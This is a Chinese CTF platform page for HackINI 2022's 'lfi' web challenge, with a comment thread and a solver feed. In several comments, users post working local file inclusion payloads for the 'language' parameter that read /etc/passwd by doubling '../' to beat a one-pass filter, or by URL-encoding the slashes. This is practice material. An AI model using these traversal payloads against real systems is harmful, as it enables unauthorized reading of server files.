lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1583
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
15629299376 5月前

这个题目我都没有双写绕过,直接http://49.232.142.230:13545/?language=/etc/passwd就出来了,作者还有待改进

回复 0

starest 6月前

双写绕过,把所有../换成..././即可

回复 0

MoCaser 6月前

我用的url编码 http://49.232.142.230:16456/?language=/..%2f..%2f..%2f..%2fetc/passwd

回复 0

000ooo 9月前

?language=/etc/passwd 有点意外

回复 1

Zhumeng 9月前

根据页面提示输入language 然后 str_replace只替换一次双写绕过通过路径穿越读取/etc/passwd即可读取flag

回复 0

意大利炮 10月前

/?language=/....//....//....//....//etc/passwd

回复 0

小白帽来挖个漏洞 11月前

解析:https://blog.csdn.net/guanrongl/article/details/142967307

回复 0

阿甘先生 11月前

?language=..//etc/passwd

回复 0

jun1223 1年前

?language=/etc/passwd 这也行

回复 3

userxin 1年前

?language=/../../../../../etc/passwd

回复 0

WriteUp

image
a2cai

2 金币

评分(1)

解题动态

咻猫 攻破了该题 5小时前
htbn 攻破了该题 1天前
fengzige 攻破了该题 1天前
g0tshe11 攻破了该题 1天前
charas 攻破了该题 1天前
1234567nxb 攻破了该题 2天前
jiexixjie 攻破了该题 2天前
whlzdb 攻破了该题 3天前
hufeiyang 攻破了该题 3天前
901548546 攻破了该题 4天前
psych1 攻破了该题 4天前
shineya 攻破了该题 4天前
捏捏捏扣 攻破了该题 4天前
luvwq 攻破了该题 4天前
孙燕姿圈外男友 攻破了该题 4天前
hgj123 攻破了该题 4天前
yqy192073 攻破了该题 4天前
tdwj 攻破了该题 5天前
5032894 攻破了该题 5天前
15031597817 攻破了该题 5天前
问题反馈